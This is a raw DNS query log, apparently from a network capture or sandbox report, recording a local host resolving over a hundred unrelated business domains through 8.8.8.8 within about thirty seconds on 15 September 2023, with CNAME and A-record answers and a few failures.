                                                                                                                                                                              Sep 15, 2023 07:26:22.881170988 CEST8.8.8.8192.168.2.30x326cNo error (0)www.studyrussian.comstudyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:22.881170988 CEST8.8.8.8192.168.2.30x326cNo error (0)studyrussian.com80.74.154.6A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:22.917699099 CEST8.8.8.8192.168.2.30x7853No error (0)www.abdg.com192.252.154.18A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:22.934640884 CEST8.8.8.8192.168.2.30x2c2aNo error (0)www.waldi.plwaldi.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:22.934640884 CEST8.8.8.8192.168.2.30x2c2aNo error (0)waldi.pl46.242.238.60A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:23.065069914 CEST8.8.8.8192.168.2.30xbfb0No error (0)www.ora.ecnet.jpora.ecnet.jpCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:23.065069914 CEST8.8.8.8192.168.2.30xbfb0No error (0)ora.ecnet.jp60.43.154.138A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:23.134416103 CEST8.8.8.8192.168.2.30xb566No error (0)www.xaicom.esxaicom.esCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:23.134416103 CEST8.8.8.8192.168.2.30xb566No error (0)xaicom.es188.165.133.163A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:23.321044922 CEST8.8.8.8192.168.2.30x3942No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:23.321044922 CEST8.8.8.8192.168.2.30x3942No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:23.767743111 CEST8.8.8.8192.168.2.30xba07No error (0)www.naoi-a.com202.254.236.40A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:23.888921976 CEST8.8.8.8192.168.2.30x840fNo error (0)www.wkhk.net206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:23.913152933 CEST8.8.8.8192.168.2.30xc159No error (0)www.aevga.comaevga.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:23.913152933 CEST8.8.8.8192.168.2.30xc159No error (0)aevga.com108.167.164.216A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:24.272840023 CEST8.8.8.8192.168.2.30x3530No error (0)www.gpthink.com39.99.233.155A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:24.347647905 CEST8.8.8.8192.168.2.30xe1ccNo error (0)www.iamdirt.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:24.347647905 CEST8.8.8.8192.168.2.30xe1ccNo error (0)ghs.googlehosted.com142.251.41.51A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:24.570951939 CEST8.8.8.8192.168.2.30x6289No error (0)www.mqs.com.brwww.mqs.com.br.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:24.570951939 CEST8.8.8.8192.168.2.30x6289No error (0)www.mqs.com.br.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:24.570951939 CEST8.8.8.8192.168.2.30x6289No error (0)www.mqs.com.br.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:24.587358952 CEST8.8.8.8192.168.2.30x6ec2No error (0)www.stnic.co.uk77.68.50.105A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:24.618594885 CEST8.8.8.8192.168.2.30x7761No error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:24.846873045 CEST8.8.8.8192.168.2.30xdee7Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.095179081 CEST8.8.8.8192.168.2.30x670dNo error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.110821962 CEST8.8.8.8192.168.2.30x782fNo error (0)www.wifi4all.nl104.21.42.10A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.110821962 CEST8.8.8.8192.168.2.30x782fNo error (0)www.wifi4all.nl172.67.198.26A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.115302086 CEST8.8.8.8192.168.2.30xee34No error (0)www.netcr.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.115302086 CEST8.8.8.8192.168.2.30xee34No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.115302086 CEST8.8.8.8192.168.2.30xee34No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.115302086 CEST8.8.8.8192.168.2.30xee34No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.192724943 CEST8.8.8.8192.168.2.30x976aNo error (0)www.medius.sid2r2uj0bnofxxz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.192724943 CEST8.8.8.8192.168.2.30x976aNo error (0)d2r2uj0bnofxxz.cloudfront.net13.249.85.117A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.192724943 CEST8.8.8.8192.168.2.30x976aNo error (0)d2r2uj0bnofxxz.cloudfront.net13.249.85.28A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.192724943 CEST8.8.8.8192.168.2.30x976aNo error (0)d2r2uj0bnofxxz.cloudfront.net13.249.85.51A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.192724943 CEST8.8.8.8192.168.2.30x976aNo error (0)d2r2uj0bnofxxz.cloudfront.net13.249.85.114A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.305180073 CEST8.8.8.8192.168.2.30x36d5Name error (3)www.medisa.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.560211897 CEST8.8.8.8192.168.2.30xf8f1No error (0)www.mobilnic.net154.203.14.100A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.568854094 CEST8.8.8.8192.168.2.30xd325No error (0)www.fcwcvt.org172.67.134.134A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.568854094 CEST8.8.8.8192.168.2.30xd325No error (0)www.fcwcvt.org104.21.25.200A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.867336988 CEST8.8.8.8192.168.2.30xffe0No error (0)www.ka-mo-me.com211.1.226.67A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.901731968 CEST8.8.8.8192.168.2.30x840fNo error (0)www.wkhk.net206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.908819914 CEST8.8.8.8192.168.2.30xb69fNo error (0)www.jchysk.com208.97.178.138A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.995341063 CEST8.8.8.8192.168.2.30x6feeNo error (0)www.lrsuk.comlanguage-recruitment.eu-2.volcanic.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.995341063 CEST8.8.8.8192.168.2.30x6feeNo error (0)language-recruitment.eu-2.volcanic.cloudd2kt7vovxa5e81.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.995341063 CEST8.8.8.8192.168.2.30x6feeNo error (0)d2kt7vovxa5e81.cloudfront.net99.84.160.31A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.995341063 CEST8.8.8.8192.168.2.30x6feeNo error (0)d2kt7vovxa5e81.cloudfront.net99.84.160.7A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.995341063 CEST8.8.8.8192.168.2.30x6feeNo error (0)d2kt7vovxa5e81.cloudfront.net99.84.160.34A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:25.995341063 CEST8.8.8.8192.168.2.30x6feeNo error (0)d2kt7vovxa5e81.cloudfront.net99.84.160.19A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:26.070754051 CEST8.8.8.8192.168.2.30x679eNo error (0)www.nelipak.nl82.201.61.230A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:26.166137934 CEST8.8.8.8192.168.2.30x9e41No error (0)www.snugpak.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:26.166137934 CEST8.8.8.8192.168.2.30x9e41No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:26.601336956 CEST8.8.8.8192.168.2.30xdb45No error (0)www.dayvo.com104.21.68.7A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:26.601336956 CEST8.8.8.8192.168.2.30xdb45No error (0)www.dayvo.com172.67.184.30A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:26.636661053 CEST8.8.8.8192.168.2.30xd9baNo error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:26.723033905 CEST8.8.8.8192.168.2.30x304bNo error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:26.797158003 CEST8.8.8.8192.168.2.30xbc8fNo error (0)www.nunomira.comnunomira.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:26.797158003 CEST8.8.8.8192.168.2.30xbc8fNo error (0)nunomira.com192.241.158.94A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:26.893848896 CEST8.8.8.8192.168.2.30xedd5No error (0)www.com-sit.com104.26.10.81A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:26.893848896 CEST8.8.8.8192.168.2.30xedd5No error (0)www.com-sit.com172.67.70.223A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:26.893848896 CEST8.8.8.8192.168.2.30xedd5No error (0)www.com-sit.com104.26.11.81A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:27.035844088 CEST8.8.8.8192.168.2.30x3183No error (0)www.stajum.com162.43.120.128A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:27.098687887 CEST8.8.8.8192.168.2.30xbc9cNo error (0)www.edimart.hu81.2.194.241A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:27.120706081 CEST8.8.8.8192.168.2.30x99d9No error (0)www.kernsafe.com172.67.72.98A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:27.120706081 CEST8.8.8.8192.168.2.30x99d9No error (0)www.kernsafe.com104.26.3.124A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:27.120706081 CEST8.8.8.8192.168.2.30x99d9No error (0)www.kernsafe.com104.26.2.124A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:27.239871025 CEST8.8.8.8192.168.2.30x863eNo error (0)www.crcsi.orgcrcsi.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:27.239871025 CEST8.8.8.8192.168.2.30x863eNo error (0)crcsi.org165.227.252.190A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:27.360907078 CEST8.8.8.8192.168.2.30xf9dcName error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:27.409465075 CEST8.8.8.8192.168.2.30xb5c0No error (0)www.pupi.cz103.224.182.241A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:27.556720972 CEST8.8.8.8192.168.2.30x3e82No error (0)www.vexcom.com172.67.173.200A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:27.556720972 CEST8.8.8.8192.168.2.30x3e82No error (0)www.vexcom.com104.21.55.224A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:27.599423885 CEST8.8.8.8192.168.2.30x7761No error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:27.756120920 CEST8.8.8.8192.168.2.30x16d8No error (0)www.ora-ito.com213.186.33.40A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:27.910528898 CEST8.8.8.8192.168.2.30x840fServer failure (2)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:27.949009895 CEST8.8.8.8192.168.2.30x6107No error (0)www.sjbs.orgsjbs.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:27.949009895 CEST8.8.8.8192.168.2.30x6107No error (0)sjbs.org69.163.239.62A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:28.082874060 CEST8.8.8.8192.168.2.30xcf05No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:28.084510088 CEST8.8.8.8192.168.2.30xe027No error (0)www.pcgrate.com104.21.66.46A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:28.084510088 CEST8.8.8.8192.168.2.30xe027No error (0)www.pcgrate.com172.67.201.26A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:28.677155972 CEST8.8.8.8192.168.2.30x518fNo error (0)www.maktraxx.commaktraxx.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:28.677155972 CEST8.8.8.8192.168.2.30x518fNo error (0)maktraxx.com72.44.93.236A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:28.821767092 CEST8.8.8.8192.168.2.30x45e9No error (0)www.tyrns.com217.79.184.35A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:28.824556112 CEST8.8.8.8192.168.2.30x535bNo error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:28.824556112 CEST8.8.8.8192.168.2.30x535bNo error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:28.968141079 CEST8.8.8.8192.168.2.30xb392No error (0)www.fink.com69.163.218.51A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:29.110761881 CEST8.8.8.8192.168.2.30x67e2No error (0)www.cel-cpa.com104.196.26.65A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:30.408090115 CEST8.8.8.8192.168.2.30xad8dNo error (0)www.fe-bauer.de3.65.101.129A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:30.530509949 CEST8.8.8.8192.168.2.30x57d4No error (0)www.nqks.comlive.websites.hibu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:30.530509949 CEST8.8.8.8192.168.2.30x57d4No error (0)live.websites.hibu.comhibu-4.zenedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:30.530509949 CEST8.8.8.8192.168.2.30x57d4No error (0)hibu-4.zenedge.netzemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:30.530509949 CEST8.8.8.8192.168.2.30x57d4No error (0)zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.nethibu34.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:30.530509949 CEST8.8.8.8192.168.2.30x57d4No error (0)hibu34.inregion.waas.oci.oraclecloud.net147.154.0.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:30.531996012 CEST8.8.8.8192.168.2.30x3221No error (0)www.spanesi.com5.196.166.214A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:30.968069077 CEST8.8.8.8192.168.2.30x2ae2No error (0)www.myropcb.com74.208.236.101A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:31.060190916 CEST8.8.8.8192.168.2.30xb300No error (0)www.tc17.com172.67.150.80A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:31.060190916 CEST8.8.8.8192.168.2.30xb300No error (0)www.tc17.com104.21.79.244A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:32.612327099 CEST8.8.8.8192.168.2.30xfde1No error (0)www.yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:33.332979918 CEST8.8.8.8192.168.2.30x1fa3No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:33.628783941 CEST8.8.8.8192.168.2.30xb2f9No error (0)www.koz1.net72.251.233.245A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:34.611901999 CEST8.8.8.8192.168.2.30x1d3eNo error (0)www.ottospm.comwww.ottospm.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:35.244098902 CEST8.8.8.8192.168.2.30xa6daNo error (0)www.rs-ag.com172.67.152.88A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:35.244098902 CEST8.8.8.8192.168.2.30xa6daNo error (0)www.rs-ag.com104.21.1.213A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:35.617953062 CEST8.8.8.8192.168.2.30xb2f9No error (0)www.koz1.net72.251.233.245A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:36.265744925 CEST8.8.8.8192.168.2.30x61a2No error (0)www.railbook.net208.91.197.46A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:38.628024101 CEST8.8.8.8192.168.2.30xc958No error (0)www.vazir.se206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:38.630080938 CEST8.8.8.8192.168.2.30xb2f9Server failure (2)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:39.379424095 CEST8.8.8.8192.168.2.30x1639No error (0)www.t-tre.com135.181.73.98A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:39.608778000 CEST8.8.8.8192.168.2.30xc958No error (0)www.vazir.se206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:40.187741995 CEST8.8.8.8192.168.2.30x7020No error (0)www.cokocoko.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:40.187741995 CEST8.8.8.8192.168.2.30x7020No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:40.187741995 CEST8.8.8.8192.168.2.30x7020No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:40.187741995 CEST8.8.8.8192.168.2.30x7020No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:40.880702019 CEST8.8.8.8192.168.2.30x8f7eNo error (0)www.speelhal.net217.19.237.54A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:41.375895977 CEST8.8.8.8192.168.2.30xd98dNo error (0)www.findbc.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:41.375895977 CEST8.8.8.8192.168.2.30xd98dNo error (0)www.findbc.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:41.599349976 CEST8.8.8.8192.168.2.30xc958Server failure (2)www.vazir.senonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:41.743972063 CEST8.8.8.8192.168.2.30x608dNo error (0)www.c9dd.com188.166.152.188A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:41.969805002 CEST8.8.8.8192.168.2.30x88cNo error (0)www.medius.sid2r2uj0bnofxxz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:41.969805002 CEST8.8.8.8192.168.2.30x88cNo error (0)d2r2uj0bnofxxz.cloudfront.net13.249.85.117A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:41.969805002 CEST8.8.8.8192.168.2.30x88cNo error (0)d2r2uj0bnofxxz.cloudfront.net13.249.85.28A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:41.969805002 CEST8.8.8.8192.168.2.30x88cNo error (0)d2r2uj0bnofxxz.cloudfront.net13.249.85.51A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:41.969805002 CEST8.8.8.8192.168.2.30x88cNo error (0)d2r2uj0bnofxxz.cloudfront.net13.249.85.114A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:42.277966976 CEST8.8.8.8192.168.2.30x22c1No error (0)www.domon.commeubles-domon.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:42.277966976 CEST8.8.8.8192.168.2.30x22c1No error (0)meubles-domon.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:42.277966976 CEST8.8.8.8192.168.2.30x22c1No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:42.647584915 CEST8.8.8.8192.168.2.30x1a9eNo error (0)www.ka-mo-me.com211.1.226.67A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:42.748080969 CEST8.8.8.8192.168.2.30xecc5No error (0)www.pwd.orgpwd.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:42.748080969 CEST8.8.8.8192.168.2.30xecc5No error (0)pwd.org208.109.214.162A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:43.495898008 CEST8.8.8.8192.168.2.30x9fc6No error (0)www.nunomira.comnunomira.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:43.495898008 CEST8.8.8.8192.168.2.30x9fc6No error (0)nunomira.com192.241.158.94A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:43.638521910 CEST8.8.8.8192.168.2.30xda19No error (0)www.com-sit.com172.67.70.223A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:43.638521910 CEST8.8.8.8192.168.2.30xda19No error (0)www.com-sit.com104.26.10.81A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:43.638521910 CEST8.8.8.8192.168.2.30xda19No error (0)www.com-sit.com104.26.11.81A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:44.047801971 CEST8.8.8.8192.168.2.30x5d94Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:44.179476023 CEST8.8.8.8192.168.2.30xbfa8No error (0)www.vexcom.com172.67.173.200A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:44.179476023 CEST8.8.8.8192.168.2.30xbfa8No error (0)www.vexcom.com104.21.55.224A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:44.459918022 CEST8.8.8.8192.168.2.30xb764No error (0)www.yocinc.org66.94.119.160A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:44.526339054 CEST8.8.8.8192.168.2.30x388No error (0)www.sjbs.orgsjbs.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:44.526339054 CEST8.8.8.8192.168.2.30x388No error (0)sjbs.org69.163.239.62A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:45.238981962 CEST8.8.8.8192.168.2.30x510aNo error (0)www.vitaindu.com122.128.109.107A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:45.246129990 CEST8.8.8.8192.168.2.30xfe51No error (0)www.maktraxx.commaktraxx.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:45.246129990 CEST8.8.8.8192.168.2.30xfe51No error (0)maktraxx.com72.44.93.236A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:45.823131084 CEST8.8.8.8192.168.2.30x3377No error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:45.823131084 CEST8.8.8.8192.168.2.30x3377No error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:45.838069916 CEST8.8.8.8192.168.2.30x335eNo error (0)www.cel-cpa.com104.196.26.65A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:46.154339075 CEST8.8.8.8192.168.2.30xd157No error (0)www.valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:46.895239115 CEST8.8.8.8192.168.2.30x66cNo error (0)www.fe-bauer.de3.65.101.129A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:47.439383030 CEST8.8.8.8192.168.2.30xe1bfNo error (0)www.2print.com2print.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:47.439383030 CEST8.8.8.8192.168.2.30xe1bfNo error (0)2print.com107.180.98.101A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:47.862878084 CEST8.8.8.8192.168.2.30x8a03No error (0)www.ottospm.comwww.ottospm.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:47.915584087 CEST8.8.8.8192.168.2.30x39bfNo error (0)www.x0c.com104.247.81.50A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:48.515782118 CEST8.8.8.8192.168.2.30x420bName error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:49.487317085 CEST8.8.8.8192.168.2.30x4e36No error (0)www.railbook.net208.91.197.46A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:50.021498919 CEST8.8.8.8192.168.2.30x3619No error (0)www.fnsds.orgexpired.namebright.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:50.021498919 CEST8.8.8.8192.168.2.30x3619No error (0)expired.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:50.021498919 CEST8.8.8.8192.168.2.30x3619No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com54.235.172.163A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:50.021498919 CEST8.8.8.8192.168.2.30x3619No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com54.211.34.254A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:50.268146038 CEST8.8.8.8192.168.2.30xc2b5No error (0)www.koz1.net72.251.233.245A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:50.466662884 CEST8.8.8.8192.168.2.30xc9e5No error (0)www.pohlfood.compohlfood.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:50.466662884 CEST8.8.8.8192.168.2.30xc9e5No error (0)pohlfood.com104.218.10.254A (IP address)IN (0x0001)false
